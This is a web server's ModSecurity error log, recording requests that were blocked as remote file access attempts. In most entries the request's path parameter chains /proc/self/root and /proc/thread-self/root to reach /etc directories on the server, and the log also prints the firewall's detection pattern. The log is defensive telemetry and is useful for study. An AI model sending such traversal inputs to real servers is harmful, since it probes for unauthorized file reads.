[Mon Mar 16 09:01:05.350745 2026] [:error] [pid 21805:tid 140411691570944] [client 74.7.243.203:58150] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxAbABkC4fWIHEf8HUOwAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:01:25.226045 2026] [:error] [pid 21533:tid 140411590858496] [client 74.7.241.46:42244] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxFXjZBu2q05ozVU8-iQAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:01:26.658340 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.241.46:50904] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxFnjZBu2q05ozVU8-iwAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:01:40.611751 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.241.46:50920] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxJHjZBu2q05ozVU8-lwAAAUc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:01:47.323921 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.241.46:52476] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxK3jZBu2q05ozVU8-owAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:01:58.898256 2026] [:error] [pid 21946:tid 140411582465792] [client 74.7.241.46:53590] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxNnbQATo66fKoS7w0wgAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:02:57.545979 2026] [:error] [pid 21806:tid 140411716749056] [client 74.7.244.31:59156] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfxcdSswJuvopo3lOhJfwAAAIM"]
[Mon Mar 16 09:03:09.125009 2026] [:error] [pid 21946:tid 140411607643904] [client 74.7.241.46:42270] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxfXbQATo66fKoS7w1HgAAANA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:03:52.355766 2026] [:error] [pid 21805:tid 140411557287680] [client 74.7.243.203:60906] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxqLABkC4fWIHEf8HUhQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:04:11.006405 2026] [:error] [pid 10772:tid 140411741927168] [client 74.7.241.46:39482] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfxu_9ocpUE4ed4uDzW1QAAAgA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:04:57.819174 2026] [:error] [pid 32654:tid 140411683178240] [client 74.7.241.46:50118] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfx6QlT9VtDQc7bgUyTkwAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:05:05.667332 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:37094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfx8bysWC90G-1nBrAvNQAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:05:24.946528 2026] [:error] [pid 10831:tid 140411641214720] [client 74.7.228.16:45388] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abfyBI6lpbStxTqkSktYXwAAAkw"]
[Mon Mar 16 09:05:48.459476 2026] [:error] [pid 21806:tid 140411658000128] [client 74.7.243.203:59594] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyHNSswJuvopo3lOhJ9gAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:05:50.879093 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.243.203:44584] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyHnjZBu2q05ozVU8_HgAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/run/initramfs/state/etc
[Mon Mar 16 09:06:00.919061 2026] [:error] [pid 21533:tid 140411741927168] [client 74.7.241.46:37110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyKHjZBu2q05ozVU8_OQAAAUA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 09:06:06.190139 2026] [:error] [pid 21533:tid 140411548894976] [client 74.7.243.203:59980] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyLnjZBu2q05ozVU8_SQAAAVc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 09:06:13.882749 2026] [:error] [pid 21533:tid 140411616036608] [client 74.7.241.46:49282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyNXjZBu2q05ozVU8_WwAAAU8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:06:15.226676 2026] [:error] [pid 10709:tid 140411691570944] [client 74.7.241.46:36874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyNxXjF1vJNtV6CWri0QAAAcY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:06:22.259555 2026] [:error] [pid 10831:tid 140411616036608] [client 74.7.243.203:42254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyPo6lpbStxTqkSktYeQAAAk8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/run/initramfs/state/etc
[Mon Mar 16 09:06:35.381404 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.243.203:58774] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyS7ysWC90G-1nBrAvUgAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 09:07:05.171203 2026] [:error] [pid 21806:tid 140411624429312] [client 74.7.241.46:36884] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyadSswJuvopo3lOhKKAAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:07:06.645387 2026] [:error] [pid 32654:tid 140411666392832] [client 74.7.241.46:51264] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfyaglT9VtDQc7bgUyTwAAAAQk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 09:07:49.327363 2026] [:error] [pid 21533:tid 140411683178240] [client 74.7.243.203:42300] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abfylXjZBu2q05ozVU9AAwAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
